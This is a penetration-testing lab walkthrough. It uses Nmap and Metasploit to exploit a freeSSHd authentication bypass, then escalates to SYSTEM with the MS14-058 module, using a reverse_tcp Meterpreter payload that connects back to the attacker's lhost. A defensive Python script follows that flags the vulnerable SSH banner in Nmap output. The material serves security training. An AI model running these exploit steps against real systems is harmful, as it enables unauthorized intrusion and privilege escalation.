
Module 05: Network Penetration Testing Methodology-External /EX 3

Written By AKADEMY on Wednesday, July 3, 2019 | 11:08 AM

Exercise 3: Pentesting freeSSHd Vulnerability and Gaining Privileged Access to a Machine

Scenario

Organizations use SSH or a similar service to secure their intra- and inter-company communications. To communicate securely, they deploy FTP/SSH services that encrypt the data flowing through their communication channels, which mitigates the risk of unauthorized interception or misuse of data. Despite such measures, attackers, with the help of various tools, are able to exploit vulnerabilities in the software that implements these protocols, and such attacks can give them partial or complete control of the computers on the network.
You are the security administrator of your organization. Your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, and data and identity theft.
A Trojan is a program that contains malicious code disguised as harmless code or data. When executed, it can take control of the host and cause damage, such as corrupting the file allocation table on the hard drive. The objectives of this lab are:
  • Pentesting the vulnerabilities in freeSSHd and establishing a Meterpreter session
  • Pentesting a Windows OS vulnerability and gaining privileged access
Lab Duration: 25 Minutes
  1. Click Windows Server 2012 (External Network), then click Ctrl+Alt+Delete.
  2. In the Password field, type Pa$$w0rd and press Enter.
    You can use the Type Password option from the Commands menu to enter the password.
  3. To install Nmap, navigate to E:\ECSAv10 Module 05 Network Penetration Testing Methodology-External\Nmap and double-click nmap-7.60-setup.exe. If an Open File - Security Warning pop-up appears, click Run and follow the steps to install the Nmap (Zenmap) scanner.
  4. To launch Nmap, double-click the Nmap - Zenmap GUI icon on the desktop.
  5. The Zenmap (Nmap) main window appears.
  6. In this lab, we perform an Intense scan on ports 1-100 of the Accounts Department Subnet C machine.
    To perform the scan, type nmap -p 1-100 -T4 -A -v 172.19.19.2 in the Command field and click Scan.
    Here we scan the IP address of a target machine located on the external network; in a real engagement you would scan domains, for example www.[targetwebsite].com, with port number 22.
  7. Nmap performs the Intense scan against the given IP address and displays the result in the Nmap Output tab.
  8. In the Nmap Output tab, we observe that port 45 is open and the service running on it is SSH.
    The version of the SSH service is WebOnlyDo sshd 2.1.3 (protocol 2.0).
    We now look for suitable exploits for this SSH version in the Metasploit Framework on Kali Linux.
  9. Click Kali Linux (External Network). If the Kali Linux lock screen appears, click on the screen and press Enter; if it does not appear, skip to the next task.
  10. Type root in the Username field and click Next.
  11. Type toor in the Password field and click Unlock.
  12. Launch a command-line terminal, type msfconsole and press Enter to start the Metasploit console.
  13. Since the SSH version was identified as WebOnlyDo sshd 2.1.3, we search msfconsole for this version to find out whether any exploits are available.
    Type search WebOnlyDo sshd 2.1.3 in msfconsole and press Enter.
  14. Metasploit returns the exploits matching the specified version.
    In this lab we use the freesshd_authbypass exploit to compromise the freeSSHd vulnerability.
  15. Type use exploit/windows/ssh/freesshd_authbypass and press Enter to select the exploit.
  16. We need to set the options associated with the exploit.
    Type show options and press Enter to view them.
  17. Here we set the values of RHOST and RPORT. Our target machine (RHOST) in this lab is Accounts Department Subnet C with the IP address 172.19.19.2, and freeSSHd is running on port 45.
    Enter the following commands in msfconsole:
    i. set rhost 172.19.19.2
    ii. set rport 45
  18. With the options set, we now exploit the machine.
    Type exploit and press Enter.
    The exploit performs a dictionary attack against the freeSSHd server using its built-in wordlist.
  19. Once it finds a valid username, it injects the shellcode into the remote machine and launches a Meterpreter session.
  20. Now type getuid and press Enter to view the user that the Meterpreter server is running as on the target machine.
    The command shows that the Meterpreter session is running as a regular user account (Admin01), which means you cannot perform privileged user actions in this session.
  21. Type sysinfo and press Enter to view information about the operating system and its architecture.
  22. Based on the operating system information, we choose a suitable exploit that can help us attain privileged access to the machine.
    In this lab, we use the ms14_058_track_popup_menu exploit module.
  23. We need to background the Meterpreter session in order to use the ms14_058_track_popup_menu module.
    Type background and press Enter.
  24. Type use exploit/windows/local/ms14_058_track_popup_menu and press Enter to select the exploit module.
  25. Now we set the session value in this module and configure the payload.
    Issue the following commands:
    i. set session 1
    ii. set payload windows/meterpreter/reverse_tcp
    iii. set lhost 172.19.19.7
  26. Type exploit and press Enter to perform privilege escalation.
  27. Once you press Enter, the module exploits the vulnerability in the operating system and presents a Meterpreter shell with escalated privileges.
  28. Type getuid and press Enter again to view the user that the Meterpreter server is running as on the target machine.
    The command now shows that the Meterpreter session is running as a privileged account (NT AUTHORITY\SYSTEM), which means privileged user actions can be performed in this session.
  29. Thus, you have exploited vulnerabilities in a Windows application and in the Windows OS to gain privileged access to the machine.
In this lab, you have learned how to:
i. Pentest the vulnerabilities in freeSSHd and establish a Meterpreter session
ii. Pentest a Windows OS vulnerability and gain privileged access
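The same banner that led the lab to the freesshd_authbypass module is what a defender should be hunting for in their own scan inventory. The following Python script is an added example, not part of the ECSA lab material: it parses Nmap normal-output port lines and flags SSH exposed on a non-standard port and the freeSSHd/WeOnlyDo sshd 2.1.3 banner, so such hosts can be upgraded or removed from the external network. The sample scan output is constructed to mirror the lab's result; note that the lab text spells the vendor "WebOnlyDo" while Nmap's probe database reports it as "WeOnlyDo", so both spellings are matched.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in Nmap normal-output style, reproducing the lab's
# finding (port 45 open, SSH, WeOnlyDo sshd 2.1.3). Other lines are filler.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 172.19.19.2
Host is up (0.0010s latency).
Not shown: 97 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
45/tcp open  ssh     WeOnlyDo sshd 2.1.3 (protocol 2.0)
80/tcp open  http    Microsoft IIS httpd 8.0
"""

# <port>/<proto> <state> <service> [version ...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# freeSSHd embeds the WeOnlyDo SSH server; 2.1.3 is the banner the lab exploited.
VULN_BANNER = re.compile(r"^(?:We|Web)OnlyDo sshd 2\.1\.3\b", re.IGNORECASE)
STANDARD_SSH_PORTS = {22}


@dataclass
class Finding:
    port: int
    service: str
    version: str
    reasons: list = field(default_factory=list)


def parse_ports(text):
    """Yield (port, proto, state, service, version) for each port line."""
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            yield int(port), proto, state, service, version


def audit(text):
    """Return Findings for open ports that match the lab's risk indicators."""
    findings = []
    for port, _proto, state, service, version in parse_ports(text):
        if state != "open":
            continue
        reasons = []
        if service == "ssh" and port not in STANDARD_SSH_PORTS:
            reasons.append(f"SSH exposed on non-standard port {port}")
        if VULN_BANNER.search(version):
            reasons.append("freeSSHd/WeOnlyDo sshd 2.1.3 banner: auth-bypass module exists")
        if reasons:
            findings.append(Finding(port, service, version, reasons))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_NMAP_OUTPUT):
        print(f"{f.port}/{f.service} {f.version}: " + "; ".join(f.reasons))
```

Feed it the saved Nmap Output text (or a file produced with -oN) from your own perimeter scans; an empty result means no port line matched either indicator.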